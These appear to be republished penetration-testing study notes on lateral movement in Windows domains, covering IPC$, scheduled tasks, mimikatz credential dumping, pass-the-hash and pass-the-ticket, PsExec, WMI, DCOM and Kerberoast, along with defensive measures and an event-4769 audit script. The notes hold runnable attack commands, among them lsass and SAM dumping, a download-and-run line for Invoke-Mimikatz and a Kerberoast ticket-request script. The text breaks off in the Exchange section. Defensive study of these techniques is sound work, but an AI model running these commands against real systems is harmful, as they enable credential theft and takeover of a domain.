Intranet learning notes (5)
2022-06-25 02:08:00 【seven six nine】
Intra-domain lateral movement: analysis and defense
- Common Windows remote connection methods and related commands
- Windows hash acquisition: analysis and prevention
- Pass-the-hash attacks and prevention
- Pass-the-ticket attacks: analysis and prevention
- PsExec
- Using WMI
- EternalBlue: analysis and prevention
- Using smbexec
- Using DCOM on remote systems
- SPNs in a domain environment
- Exchange mail server security
Intra-domain lateral movement is a technique widely used in complex intranet attacks, especially in Advanced Persistent Threats (APT). With it, an attacker uses a compromised system as a pivot to reach other hosts in the domain and expand the assets under their control (including documents and stored credentials on the pivot machine, as well as databases, domain controllers and other important assets reachable through it).
Through such attacks an attacker may eventually gain access to the domain controller, or even take complete control of the Windows-based infrastructure and the key business accounts. Strong passwords must therefore be used to protect privileged users from lateral movement attacks and prevent other machines in the domain from being compromised. System administrators are also advised to change passwords regularly, which invalidates any credentials an attacker has already obtained.
Common Windows remote connection methods and related commands
In a penetration test, once the target's plaintext password or NTLM hash has been obtained, a PTH (Pass the Hash) attack can be used to pass the hash or the plaintext password to the target for authentication. Once a connection to the target is established, commands can be executed on the remote Windows system by the methods described below. In a multi-layer proxy environment, poor network conditions often make it impossible to reach the remote host through a graphical interface; in that case the command line is used to connect to the remote host (preferably with Windows built-in commands) and execute commands.
In a real network, administrators can defend against this by configuring the Windows built-in firewall or Group Policy.
IPC
IPC (Internet Process Connection) is a named-pipe resource shared for inter-process communication. An IPC connection authenticates with a user name and password and grants the corresponding permissions; it is usually used to manage a computer remotely and to view its shared resources.
Through ipc$, a connection to the target machine can be established. Over this connection you can not only access, upload and download files on the target, but also run other commands to obtain the target's directory structure, user list and other information.
First, establish an ipc$ connection with the following command:
C:\Users\Administrator> net use \\1.1.1.10\ipc$ "123456Aa" /user:Administrator
Then enter net use at the command line to view the current connections:
net use
1. Conditions for using ipc$
(1) Ports 139 and 445 are open
ipc$ enables remote login and access to the default shares; an open port 139 indicates that the NetBIOS protocol is in use. File and printer sharing is reached through ports 139 and 445 (Windows 2000). In general, therefore, ipc$ requires ports 139 and 445.
(2) The administrator has enabled the default shares
The default shares are enabled by default to facilitate remote administration; they include every logical drive (c$, d$, e$, etc.) and the system directory winnt or windows (admin$). These default shares can be accessed through ipc$.
2. Reasons an ipc$ connection fails
- Wrong user name or password.
- The target has not enabled the default ipc$ share.
- Ports 139 and 445 on the target could not be reached.
- Command typed incorrectly.
3. Common error numbers
- Error 5: Access denied.
- Error 51: Windows cannot find the network path; that is, there is a network problem.
- Error 53: Network path not found, including a wrong IP address, a target that is powered off, the lanmanserver service not started on the target, or a firewall (port filtering) on the target.
- Error 67: Network name not found, including the lanmanworkstation service not started or ipc$ having been deleted.
- Error 1219: The supplied credentials conflict with an existing set of credentials. For example, an ipc$ connection to the target already exists; delete the original connection and reconnect.
- Error 1326: Unknown user name or bad password.
- Error 1792: Attempting to log on, but the network logon service was not started, including the NetLogon service not started on the target (occurs when connecting to a domain controller).
- Error 2242: This user's password has expired. For example, the target has an account policy that forces users to change passwords regularly.
Obtaining remote host information with Windows built-in tools
1. dir command
After establishing an ipc$ connection to the remote target with net use, the dir command lists the files on the remote host:
dir \\1.1.1.8\c$
2. tasklist command
After establishing an ipc$ connection to the remote target with net use, tasklist with the /S, /U and /P parameters lists the processes running on the remote host:
tasklist /S 1.1.1.10 /U Administrator /P 123456Aa
Scheduled tasks
1. at command
at is a Windows built-in command for creating scheduled tasks; it mainly works on Windows Server 2008 and earlier. Creating a scheduled task on a remote target with at roughly follows these steps:
- Use net time to determine the remote machine's current system time.
- Use copy to copy the payload file to the remote target.
- Use at to start the payload file at the scheduled time.
- Delete the record of the scheduled task created with at.
Before creating a scheduled task on a remote machine with at, an ipc$ connection must be established with net use.
(1) View the target's system time
net time shows the system time of the remote host:
net time \\1.1.1.8
(2) Copy the file to the target
First create a calc.bat file locally whose content is "calc" (it makes Windows run the Calculator program). Then copy it to the C drive of the remote host with the Windows built-in copy command:
copy calc.bat \\1.1.1.8\C$
(3) Create a scheduled task with at
Use net time to get the remote host's current system time, then use at to make the target run the program at the specified time:
at \\1.1.1.10 4:10PM C:\calc.bat
(4) Remove the at record
A scheduled task is not deleted after it runs, so a network administrator can tell from the task the attacker created that the network has been attacked.
at \\1.1.1.10 7 /delete # delete the scheduled task that was created (7 is its task ID)
When executing commands remotely with at, first write the result to a text file on the target, then read the file remotely with type:
at \\1.1.1.10 4:10PM cmd.exe /c "ipconfig > C:\1.txt"
type \\1.1.1.10\C$\1.txt
2. schtasks command
Windows Vista, Windows Server 2008 and later replace the at command with schtasks.
1. Create a scheduled task named "test" on the remote host. The task starts at boot, runs calc.bat on the C drive, and runs as System:
schtasks /create /s 1.1.1.10 /tn test /sc onstart /tr c:\calc.bat /ru system /f
2. Run the scheduled task named test on the remote host:
schtasks /run /s 1.1.1.10 /i /tn "test"
3. No password is needed for the schtasks command because an ipc$ connection to the target has already been established. If it has not, add the /u and /p parameters:
/u administrator
/p "123456Aa"
/f forces deletion
4. Delete the scheduled task after it has run:
schtasks /delete /s 1.1.1.10 /tn "test" /f
5. Finally, delete the ipc$ connection:
net use \\1.1.1.10\ipc$ /del /y # when deleting ipc$, be sure to delete the connection you created yourself
When schtasks is used, a log file is left on the system at C:\Windows\Tasks\SchedLgU.txt. If a schtasks command produces no output, an executable can be run over ipc$ and the result read remotely with type.
After an IPC connection is established, besides obtaining a shell indirectly through scheduled tasks, PsExec can be used to obtain a shell directly.
PsExec download: https://download.sysinternals.com/files/PSTools.zip
PsExec.exe -accepteula \\192.168.7.107 -s cmd.exe
Windows hash acquisition: analysis and prevention
LM Hash and NTLM Hash
The Windows operating system usually uses two methods to encrypt users' plaintext passwords. In a domain environment, user information is stored in ntds.dit as hash values. A Windows password hash usually consists of two parts, an LM Hash and an NTLM Hash, and is structured as follows:
username:RID:LM-HASH:NT-HASH
LM Hash stands for "LAN Manager Hash", a hashing algorithm Microsoft introduced to improve the security of Windows; it is essentially DES encryption. Although LM Hash is fairly easy to crack, Windows only disabled it (by default since Windows Vista and Windows Server 2008) in order to preserve compatibility. An LM Hash can only represent passwords of up to 14 characters, so setting a password longer than 14 characters is enough to stop LM Hash from being used. When LM Hash is disabled, the LM Hash an attacker dumps is usually "aad3b435b51404eeaad3b435b51404ee" (meaning the LM Hash is empty or disabled).
NTLM Hash is a hashing algorithm Microsoft designed to improve security while keeping compatibility; it is based on the MD4 algorithm. Since Windows Vista on the client side and Windows Server 2003 on the server side, Windows authenticates with NTLM Hash.
Single-machine password capture and prevention
To capture hash values or plaintext passwords on Windows, privileges must be elevated to System. Local user names, hash values and other security information are stored in the SAM file. The lsass.exe process enforces Windows security policy (local security policy and logon policy). Tools can export hash values and plaintext passwords from the memory of the lsass.exe process or from the SAM file.
On Windows, the SAM file is stored in C:\Windows\System32\config. The file is locked and cannot be copied. In a penetration test the traditional approach is to shut down Windows, boot into a PE disk to get a file manager and copy the SAM file directly; VSS and similar methods can also be used. Common stand-alone password capture tools and methods are analyzed below, with preventive suggestions.
1. GetPass
Open the GetPass tool directory and run GetPassword_x64.exe from the command line. After the program runs, the plaintext password is obtained.
2. PwDump7
Run PwDump7 from the command line to obtain the NTLM Hash of every account on the system. The hashes can be cracked with rainbow tables; if that fails, pass-the-hash can be used for lateral penetration testing.
3. Capturing passwords through the SAM and System files
(1) Export the SAM file without tools
reg save hklm\sam sam.hive # the save option of reg exports the SAM and System hives from the registry to local disk
reg save hklm\system system.hive
(2) Obtain the NTLM Hash by reading the SAM and System files
① Read them with mimikatz
lsadump::sam /sam:sam.hive /system:system.hive # place the exported files in the same directory as mimikatz
② Read the local SAM file directly with mimikatz
After processing mimikatz to evade anti-virus, upload it to the target machine and start it from the command line:
privilege::debug # elevate privileges
token::elevate # System privileges
lsadump::sam # read the local SAM file to obtain the NTLM Hash
4. Read the SAM file online with mimikatz
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" # read hash values and plaintext passwords online
5. Read the lsass.dmp file offline with mimikatz
(1) Export lsass.dmp
Export lsass.dmp with Task Manager.
On Windows NT6 the dump can be created directly from Task Manager.
(2) Export lsass.dmp with Procdump
Procdump is an official Microsoft tool; it can dump the lsass process from the command line, and anti-virus software does not block it.
procdump.exe -accepteula -ma lsass.exe lsass.dmp
(3) Export the password hashes from lsass.dmp with mimikatz
Run mimikatz and load the lsass.dmp file:
sekurlsa::minidump lsass.dmp # "Switch to MINIDUMP" indicates the file loaded successfully
sekurlsa::logonPasswords full # export the password hashes
6. Dump hash values with PowerShell
Open PowerShell as administrator, enter the nishang directory and import the Get-PassHashes.ps1 script:
Get-PassHashes
7. Load mimikatz remotely with PowerShell to grab hashes and passwords
powershell IEX (New-Object Net.WebClient).DownloadString('https://.../Invoke-Mimikatz.ps1');Invoke-Mimikatz
Obtaining passwords with HashCat
For hashcat usage, refer to the Hashcat usage notes.
How to prevent attackers from grabbing plaintext passwords and hash values
1. Set the Active Directory 2012 R2 functional level
Windows Server 2012 R2 adds a user group called "Protected Users". Simply placing the users to be protected in this group prevents attackers from grabbing their plaintext passwords and hash values with mimikatz and similar tools.
2. Install KB2871997
KB2871997 is a patch Microsoft released to address the problem of remote access via PsExec or IPC (ipc$). It stops local accounts from connecting to the computer remotely, with the exception of the default local administrator account Administrator, whose SID is 500: even if Administrator is renamed, its SID remains 500, and an attacker can still use it to move laterally and gain control of other computers in the intranet. After installing KB2871997, the default Administrator account should also be disabled to guard against pass-the-hash attacks.
In daily network maintenance the patch can be applied automatically through Windows Update, or downloaded from Microsoft's website and installed manually.
3. Disable storing plaintext passwords in memory by modifying the registry
In Windows XP Microsoft added a protocol called WDigest, which makes Windows keep the plaintext password in memory so that users can log on to the local computer conveniently.
Modifying the registry stops passwords from being stored in memory in plaintext.
4. Defending against mimikatz
The Debug privilege determines which users can attach a debugger to any process or to the kernel. By default it is held by the local Administrators group, but unless they are debugging a system process, local administrators rarely need it.
mimikatz needs the Debug privilege to grab hash values or plaintext passwords (because mimikatz interacts with the lsass process and cannot read it without the Debug privilege). When maintaining the network, this can be used defensively: remove the Debug privilege from the local Administrators group. After restarting the system, running mimikatz and entering "privilege::debug" produces an error, and mimikatz can no longer grab hash values and plaintext passwords.
Pass-the-hash attacks and prevention
The concept of a pass-the-hash attack
Most penetration testers have heard of the Pass The Hash attack. It uses the password hash associated with an account (usually the NTLM Hash) to authenticate. In a domain environment, users mostly log on with domain accounts, and many computers are installed with the same local administrator account and password.
If the computers' local administrator accounts and passwords are the same, an attacker can therefore log on to other computers in the intranet with pass-the-hash. By passing the hash, the attacker does not need to spend time cracking password hashes to recover the plaintext.
In a Windows network, hash values are used to prove identity (having the correct user name and password hash is enough to pass authentication). Microsoft's own products and tools obviously do not support this attack, so attackers usually use third-party tools. On Windows Server 2012 R2 and later, plaintext passwords are no longer kept in memory by default, so attackers often pass hash values to other computers to authenticate and take control of remote machines.
Analysis
Hash values: when users log on to a website, if the website stores their passwords in plaintext, a single security flaw in the website exposes every user's plaintext password. This is why hash values were introduced. When a user sets a password, the web server hashes it (usually with MD5). A hash algorithm is generally one-way and irreversible. When the user logs on, the entered password is hashed first and compared with the stored hash; if they match, authentication succeeds.
Mainstream Windows operating systems usually authenticate access to resources with NTLM Hash; early versions of Windows used LM Hash to verify passwords. However, LM Hash cannot be used when the password is 15 characters or longer. Since Windows Vista and Windows Server 2008, Windows disables LM Hash by default. NTLM authentication never uses the plaintext password; instead the plaintext is converted to a hash through system APIs (for example LsaLogonUser). Even so, once an attacker obtains the password hash, pass-the-hash can still be used to impersonate the user.
Updating the KB2871997 patch
Microsoft released KB2871997 in May 2014. The patch prevents connecting to remote computers with local administrator privileges, which means a local administrator can no longer use PsExec, WMI, smbexec or schtasks against the remote computer, nor access its file shares. In practice, however, after KB2871997 is installed the Administrator account (SID 500) is an exception: pass-the-hash still works with this account's hash.
The emphasis here is on the account with SID 500. On some computers, even if Administrator has been renamed, its SID does not change. An attacker who moves laterally with the SID 500 account is therefore unaffected by KB2871997; this deserves special attention in actual network maintenance.
Pass-the-ticket attacks: analysis and prevention
Using mimikatz's pass-the-hash function requires local administrator privileges. mimikatz also provides a method for lateral penetration testing without local administrator privileges, such as Pass The Ticket (PTT). This section analyzes the idea of a pass-the-ticket attack through experiments and gives preventive measures.
Pass the ticket with mimikatz
mimikatz "privilege::debug" "sekurlsa::tickets /export" # mimikatz exports the tickets in memory
After the above command runs, ticket files for multiple services appear in the current directory, for example krbtgt, cifs and ldap.
kerberos::purge # clear the tickets in memory with mimikatz
mimikatz "kerberos::ptt C:\Users\Administrator\Desktop\[0;3e4]-0-0-40a50000-WIN-2008[email protected]GC-WIN-2012.hello.testlab.kirbi" # inject the ticket file into memory
After the high-privilege ticket file is injected into memory, the directories of the remote computer can be listed:
dir \\WIN-2008\c$
Pass the ticket with kekeo
Tickets can also be passed with kekeo. The domain name, user name and NTLM Hash are needed together to generate a ticket, which is then imported to connect directly to the remote computer.
How to prevent pass-the-ticket attacks
- When using the dir command, be sure to use the host name; using an IP address results in an error.
- Ticket files in memory are valid for 10 hours by default.
- Tickets can be passed on the target machine without local administrator permission.
- From the points above, an approach to defending against pass-the-ticket attacks can be worked out.
PsExec
PsExec is a powerful tool in the SysInternals suite. It was originally used mainly for operating and maintaining large numbers of Windows hosts, and it is especially effective in a domain environment. However, attackers began to use PsExec to connect to and even control the target machine from the command line, without using the Remote Desktop Protocol (RDP) for graphical control, which reduces the chance of malicious operations being noticed by the administrator (because PsExec is a tool provided by Windows, anti-virus software whitelists it). PsExec runs on Windows Vista/NT 4.0/2000/XP/Server 2003/Server 2008/Server 2012/Server 2016 (including 64-bit versions).
PsExec in the PsTools kit
PsExec is included in the PsTools kit. With PsExec, commands can be executed on a remote computer, and administrator privileges can be elevated to System to run a specified program. How PsExec works: it creates a psexec service on the remote target through a pipe and writes a binary named "PSEXESVC" to disk, then runs the command through the psexec service and deletes the service afterwards.
First, an interactive shell on the target is needed. With an ipc$ connection established, run the following command to obtain a shell with System privileges.
The psexec module in Msf
Metasploit's plug-ins are written in Ruby, and penetration testers can write their own and integrate them into the Metasploit framework. Network maintainers can use this tool to examine the machines in the networks they manage, find and fix problems in time, and improve overall business security.
Using WMI
WMI stands for "Windows Management Instrumentation". Every Windows version since Windows 98 supports WMI. WMI is a set of tools for managing computer systems locally or remotely.
Since PsExec came under close monitoring in intranets and more and more anti-virus vendors blacklisted it, WMI can be used for lateral movement instead. Penetration tests show that when wmic.exe is used for lateral movement, Windows does not log WMI operations by default. Because no log is produced, tracing the attack costs the network administrator more; for the attacker, the probability of being noticed is reduced and stealth is improved.
Basic commands
wmic /node:1.1.1.10 /user:Administrator /password:123456Aa process call create "cmd.exe /c ipconfig >c:\ip.txt" # run a command with the target's cmd.exe and save the result on the C drive
After establishing ipc$, read the result with type:
net use \\1.1.1.8\ipc$ "123456Aa" /user:Administrator
type \\1.1.1.8\C$\ip.txt
Next, wmic executes commands remotely by starting the Windows Management Instrumentation service on the remote system (the target must have port 135 open, and wmic commands run on the remote system with administrator privileges). If the target has its firewall enabled, wmic cannot connect.
In addition, wmic produces no output, so ipc$ and type are needed to read the result. Note that if wmic runs a malicious program, no log is produced.
wmiexec in the impacket kit
Download and install the impacket toolkit on Kali. As shown in Figure 5-74, entering the following command obtains the target's shell. This method is mainly used for lateral penetration tests from Linux to Windows.
wmiexec.vbs
The wmiexec.vbs script calls WMI from VBS to emulate PsExec. wmiexec.vbs can execute commands on the remote system and return their output, giving a semi-interactive shell on the remote host.
Invoke-WmiCommand
The Invoke-WmiCommand.ps1 script is included in the PowerSploit toolkit. It calls WMI from PowerShell to execute commands remotely, so in essence it still uses WMI.
Invoke-WMIMethod
With PowerShell's built-in Invoke-WMIMethod, commands and specified programs can be executed on a remote system. Run the following commands in the PowerShell command line; they execute non-interactively and return no output.
EternalBlue: analysis and prevention
The vulnerability sends a crafted command to the SMBv1 service of a Windows server, causing an overflow that eventually leads to arbitrary command execution. On Windows the SMB service is on by default and listens on port 445 by default, so the impact of this vulnerability is great. The affected operating systems include Windows NT, Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows 7, Windows 8, Windows Server 2008, Windows Server 2008 R2 and Windows Server 2012 R2. Newer versions of Metasploit integrate a test module for the MS17-010 vulnerability.
The methods for defending Windows against the "EternalBlue" vulnerability are as follows:
- Disable the SMB protocol (applies to Windows Vista and later).
- Enable Windows Update, or install KB2919355 manually.
- Block connections to port 445 with a firewall, or use inbound/outbound rules to prevent connections to port 445.
- Do not open unfamiliar files casually.
- Install anti-virus software and keep its virus database up to date.
Using smbexec
smbexec uses file shares (admin$, c$, ipc$, d$) to execute commands on a remote system.
The C++ version of smbexec
smbexec.py in the impacket kit
Remote command execution from Linux to Windows
Using DCOM on remote systems
DCOM (Distributed Component Object Model) is a set of Microsoft concepts and program interfaces. Through DCOM, a client program object can send requests to a server program object on another computer in the network.
DCOM is based on the Component Object Model (COM). COM provides a set of interfaces that allow clients and servers on the same computer to communicate (it runs on Windows 95 and later).
When moving laterally, an attacker who wants to execute a command or payload on a remote system has, besides the at, schtasks, PsExec, WMI, smbexec and PowerShell methods described earlier, to contend with the many devices deployed in the network environment, such as IPS and traffic-analysis systems. Knowing more about lateral movement methods is of great benefit to daily system security maintenance.
Executing commands through local DCOM
1. Obtain the list of DCOM applications
The Get-CimInstance cmdlet (PowerShell command) is available by default only in PowerShell 3.0 and later; that is, only Windows Server 2012 and later can use Get-CimInstance. The command is:
Get-CimInstance win32_DCOMApplication
Because Windows 7 and Windows Server 2008 ship with PowerShell 2.0 by default, they do not support Get-CimInstance; use Get-WmiObject instead.
Start a local PowerShell with administrator privileges and run the following command:
Get-WmiObject -Namespace ROOT\cimv2 -Class Win32_DCOMApplication
2. Execute arbitrary commands with DCOM
Start a local PowerShell with administrator privileges:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")
After execution, calc runs in the current session with Administrator privileges.
This method runs the "Calculator" program through ExecuteShellCommand.
Executing commands on remote machines with DCOM
When using this method, the system firewall must be turned off. Executing a command on a remote machine requires an account with local administrator privileges.
1. Connect to the remote computer through ipc$
2. Execute the command
SPN Application in domain environment
Windows The domain environment is based on Microsoft's active directory service , It disperses the physical location in the network system environment 、 Users from different departments are grouped , Centralize resources , Effectively allocate resource access control permissions in a fine-grained manner , It improves the security of network environment and the convenience of unified distribution and management of network resources . In the domain environment
A large number of applications running in contain a variety of resources , For rational grouping of resources 、 Classification and redistribution facilitate . Microsoft assigns different service principal names to each resource in the domain (Service Principal Name,SPN).
SPN scanning
1. Relevant concepts
When the Kerberos protocol is used for authentication in a network, a service must either run under a built-in account (NetworkService, LocalSystem) or have an SPN registered for the user account it runs as. For built-in accounts the SPN is registered automatically, but if the service runs under a domain user account, the SPN must be registered manually for that account. Because every service in the domain needs an SPN registered for Kerberos authentication, an attacker can send query requests directly to the domain controller, obtain the SPNs of the services they are interested in, and thus learn which machine hosts which service resource.
Kerberos authentication uses the SPN to associate a service instance with its service logon account. If more than one service instance is installed on a computer in the domain, each instance must have its own SPN. If clients may use several names to authenticate to it, a given service instance can have multiple SPNs. For example, an SPN always contains the host name of the computer running the service instance, so a service instance can register one SPN for each name or alias of its host. According to the Kerberos protocol, when a user logs on to Active Directory with an account name and password, the domain controller verifies them; once they pass, the Key Distribution Center (KDC) sends a ticket-granting ticket (TGT) to the user, which serves as the user's identity credential when accessing resources.
Here is an example. When a user needs to access the MSSQL service, the system, as the current user, queries the domain controller for an SPN record of the "MSSQLSvc" class. After the SPN record is found, the user contacts the KDC again, presenting the TGT issued earlier as its identity credential together with the SPN of the service it wants to access. The KDC's ticket-granting service (TGS) decrypts and validates the TGT and, if it is valid, sends the user a service ticket for the service that corresponds to the SPN, together with the address of that service. This ticket allows the user to access the MSSQL service.
The format of an SPN is as follows:
SPN = serviceclass "/" hostname [":" port] ["/" servicename]
- serviceclass: the name of the service component.
- hostname: separated from what follows by "/"; the computer's fully qualified domain name (FQDN), i.e. the computer name together with the domain name.
- port: separated from the hostname by a colon; the port number the service listens on.
- servicename: a string, which can be the distinguished name (DN) of the service, its objectGUID, an Internet host name or a fully qualified domain name.
2. Common SPN services
A sample SPN for the MSSQL service is as follows.
MSSQLSvc/computer1.labtest.com:1433
- MSSQLSvc: the name of the service component, here the MSSQL service.
- computer1.labtest.com: the host name is computer1 and the domain name is labtest.com.
- 1433: the listening port is 1433.
serviceclass and hostname are required parts; port and servicename are optional. The colon between hostname and port is used only when the service listens on a specific (non-default) port.
A sample SPN for the Exchange service is as follows.
exchangeMDB/EXCAS01.labtest.com
A sample SPN for the RDP service is as follows.
TERMSERV/EXCAS01.labtest.com
A sample SPN for WSMan/WinRM/PSRemoting is as follows.
WSMAN/EXCAS01.labtest.com
3. PowerShell scripts for SPN scanning
When a computer joins a domain, the host SPN (HOST/...) is automatically added to the servicePrincipalName attribute of the computer account created in the domain. When a new service is installed, its SPN is also recorded in the corresponding attribute of the account it runs under.
SPN scanning is also called "scanning for Kerberos service instance names". The best way to find services in Active Directory is SPN scanning: it finds services by requesting SPNs of a specific type. Compared with network port scanning, the main feature of SPN scanning is that it does not need to connect to every IP address in the network to check service ports, so it does not trigger the rules of IPS, IDS and similar devices in the intranet that would generate large numbers of alert logs. Because SPN queries are an LDAP lookup against the domain controller that is part of normal Kerberos ticket behavior, they are difficult to detect.
The PowerShell-AD-Recon toolkit provides a set of scripts that map services to the service logon accounts and the hosts running them; these services include but are not limited to MSSQL.
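The following is an added example written for these notes; it is not code from the original page or from the PowerShell-AD-Recon toolkit. It performs the SPN scan described above with nothing but the .NET DirectorySearcher that ships with Windows, as the current domain user, and splits each SPN into the serviceclass/hostname:port/servicename parts defined earlier. The service class names, the `-AccountType` switch and the example calls are assumptions.

```powershell
# Added example, not part of the original notes: enumerate SPNs from the
# domain controller over LDAP. Runs as the current domain user, no extra tools.
function Get-DomainSpn {
    param(
        # e.g. 'MSSQLSvc', 'exchangeMDB', 'TERMSERV', 'WSMAN'; '*' returns every SPN
        [string]$ServiceClass = '*',
        # 'user' restricts to user accounts, whose passwords may be crackable;
        # computer accounts have long random passwords and are poor targets
        [ValidateSet('user', 'computer', 'any')][string]$AccountType = 'any'
    )
    $search = New-Object System.DirectoryServices.DirectorySearcher
    $search.PageSize = 1000                      # paging: large domains return >1000 objects
    $typeFilter = switch ($AccountType) {
        'user'     { '(objectCategory=person)(objectClass=user)' }
        'computer' { '(objectClass=computer)' }
        default    { '' }
    }
    # One LDAP query to the DC; no connection to the service hosts themselves
    $search.Filter = "(&$typeFilter(servicePrincipalName=$ServiceClass/*))"
    [void]$search.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'serviceprincipalname', 'objectclass'))

    foreach ($r in $search.FindAll()) {
        foreach ($spn in $r.Properties['serviceprincipalname']) {
            # SPN = serviceclass "/" hostname [":" port] ["/" servicename]
            $class, $rest      = $spn -split '/', 2
            $hostPart, $svcName = $rest -split '/', 2
            $hostName, $port   = $hostPart -split ':', 2
            [pscustomobject]@{
                Account      = [string]$r.Properties['samaccountname'][0]
                IsUser       = -not (@($r.Properties['objectclass']) -contains 'computer')
                ServiceClass = $class
                Host         = $hostName
                Port         = $port
                ServiceName  = $svcName
                SPN          = $spn
            }
        }
    }
}

# Example use (hypothetical domain): every MSSQL instance in the domain, then
# the user accounts that run services under an SPN (the Kerberoast candidates).
Get-DomainSpn -ServiceClass 'MSSQLSvc' | Format-Table Account, Host, Port -AutoSize
Get-DomainSpn -AccountType user | Sort-Object SPN -Unique | Format-Table Account, SPN -AutoSize
```

The filter on `objectCategory=person` is what distinguishes a useful Kerberoast target list from a plain service inventory: service tickets for computer-account SPNs are issued too, but their 120-character random passwords are not crackable offline.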
Kerberoast Attack analysis and prevention
Kerberoast is an attack against the Kerberos protocol. To obtain a Kerberos service ticket for a particular resource, a user first presents a TGT with valid identity permissions to the TGS and requests a ticket for the corresponding service. When the TGT is verified as valid and the user is allowed to use the service, a service ticket is sent to the user. This ticket is encrypted with the NTLM hash (RC4_HMAC_MD5) of the service account associated with the SPN; in other words, an attacker running Kerberoast tries different NTLM hashes (derived from candidate passwords) to open the Kerberos ticket. If the NTLM hash is correct, the ticket opens, and the password corresponding to that NTLM hash is the password of the service account.
In a domain environment, the attacker uses Kerberoast with ordinary user permissions to extract the credentials of service accounts from Active Directory. Because most of the work is done offline and no information is sent to the target system, it does not cause alerts from security devices. And because the domain policies of most networks are not strict enough (no password expiry is set for service accounts; service accounts have excessive permissions; the service account password is the same as that of an ordinary domain user account), service account passwords are easily affected by a Kerberoast attack.
Precautions
Against Kerberoast attacks, the following precautions apply.
- Ensure that service account passwords are longer than 25 characters; ensure the randomness of the password; change service account passwords regularly.
- Configure service accounts so that tickets are issued with the default AES256_HMAC encryption rather than RC4_HMAC_MD5. If the attacker cannot obtain an RC4-encrypted ticket, tools such as tgsrepcrack.py cannot be used to crack the password.
- Attackers can sniff and capture Kerberos TGS tickets. Therefore, if Kerberos tickets are forced to be encrypted with AES256_HMAC, then even if the attacker obtains a ticket, cracking it becomes far slower and impractical with a strong password, which protects the security of Active Directory.
- Many service accounts in the intranet have been assigned excessive permissions, and their password strength is usually poor. An attacker is likely to crack the ticket's password and escalate from domain user privileges to domain administrator privileges. Therefore, the permissions of service accounts should be configured properly and password strength increased.
- During log auditing, focus on events with ID 4769 (a Kerberos service ticket was requested). If there are too many 4769 logs, the system should be checked further for malicious behavior.
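The exchange described above, as an added example that is not part of the original notes and not the tgsrepcrack.py tooling the notes mention: the attacker side requests service tickets for a list of SPNs using only the .NET `KerberosRequestorSecurityToken` class (so the tickets land in the current logon session's cache), and the defender side implements the 4769 audit from the last precaution, flagging RC4-encrypted tickets and accounts that request many of them. The SPN list, domain and thresholds are hypothetical; the SPNs would normally come from an SPN scan or `setspn -Q`.

```powershell
# Added example (not from the original notes). Part 1: request TGS tickets
# for user-account SPNs so they can be exported and cracked offline.
Add-Type -AssemblyName System.IdentityModel

function Request-ServiceTicket {
    param([Parameter(Mandatory)][string]$Spn)
    # Asking the KDC for a ticket to this SPN stores it in the current
    # logon session; nothing is sent to the service host itself.
    $null = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
}

function Get-CachedServiceTickets {
    # Parse klist output into (service, encryption type) pairs. RC4-HMAC
    # tickets are the ones that crack quickly; AES tickets are much slower.
    $svc = $null
    foreach ($line in (klist)) {
        if ($line -match 'Server:\s*(\S+)') { $svc = $Matches[1] }
        elseif ($line -match 'Encryption Type:\s*(.+)$' -and $svc) {
            [pscustomobject]@{ Service = $svc; EncryptionType = $Matches[1].Trim() }
            $svc = $null
        }
    }
}

# Constructed target list (hypothetical SPNs on user accounts).
$targets = @('MSSQLSvc/computer1.labtest.com:1433', 'HTTP/web01.labtest.com')
foreach ($spn in $targets) { Request-ServiceTicket -Spn $spn }
Get-CachedServiceTickets | Where-Object Service -In $targets
# From here the tickets are exported (e.g. mimikatz kerberos::list /export)
# and cracked offline; RC4 tickets are the realistic targets.

# Part 2: the defender's audit of event 4769 on the domain controller.
function Get-SuspiciousTgsRequests {
    param(
        [int]$Hours = 24,
        [int]$MinRequests = 10     # one user pulling tickets for many services
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    $rows = foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        # 0x17 = RC4-HMAC. In an AES-capable domain such tickets are rare; the
        # krbtgt and computer-account ($) services are excluded to cut noise.
        if ($d.TicketEncryptionType -eq '0x17' -and
            $d.ServiceName -ne 'krbtgt' -and
            $d.ServiceName -notmatch '\$$') {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                User    = $d.TargetUserName
                Service = $d.ServiceName
                Client  = $d.IpAddress
            }
        }
    }
    # Many distinct RC4 service tickets for one user in a short window is the
    # Kerberoast pattern; a normal user touches a handful of services a day.
    $rows | Group-Object User | Where-Object Count -ge $MinRequests |
        ForEach-Object {
            [pscustomobject]@{
                User     = $_.Name
                Requests = $_.Count
                Services = ($_.Group.Service | Sort-Object -Unique) -join ', '
                Clients  = ($_.Group.Client | Sort-Object -Unique) -join ', '
            }
        } | Sort-Object Requests -Descending
}

Get-SuspiciousTgsRequests -Hours 24 -MinRequests 10 | Format-Table -AutoSize
```

The audit keys on two signals rather than raw 4769 volume: the ticket encryption type (RC4 requests where AES is the default) and the number of distinct services one account asks for. A client that explicitly downgrades to RC4 shows up in the first; a scripted request for every SPN in the domain shows up in the second.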
Exchange Mail server security
Exchange is an e-mail service component from Microsoft: a messaging and collaboration system. Exchange is often used as the main e-mail system in schools and enterprises. Its main versions are Exchange 2003, Exchange 2007, Exchange 2010, Exchange 2013, Exchange 2016 and Exchange 2019.
Exchange servers can be deployed on premises, or Exchange Online can be used, in which case the Exchange server is hosted in Microsoft's cloud. Exchange offers strong scalability, reliability and usability, together with very high processing performance and security. At the same time, Exchange is closely tied to Active Directory, domain services, the global catalog and other Microsoft services and components.
In large enterprises, most office work is done through the e-mail system, and e-mail may contain a great deal of source code, internal address books, plaintext passwords, login addresses of sensitive services, and VPN accounts and passwords that allow access to the intranet from the external network. Therefore, when hardening the server, security patches for the Exchange software and for the Exchange server itself must be applied promptly, which effectively reduces the probability of Exchange being compromised. Exchange supports local or remote operation through PowerShell; on the one hand this makes management and configuration of Exchange convenient for operations staff, on the other hand it creates the conditions for an attacker to perform malicious operations on Exchange.
Introduction
1. Introduction to mail server roles
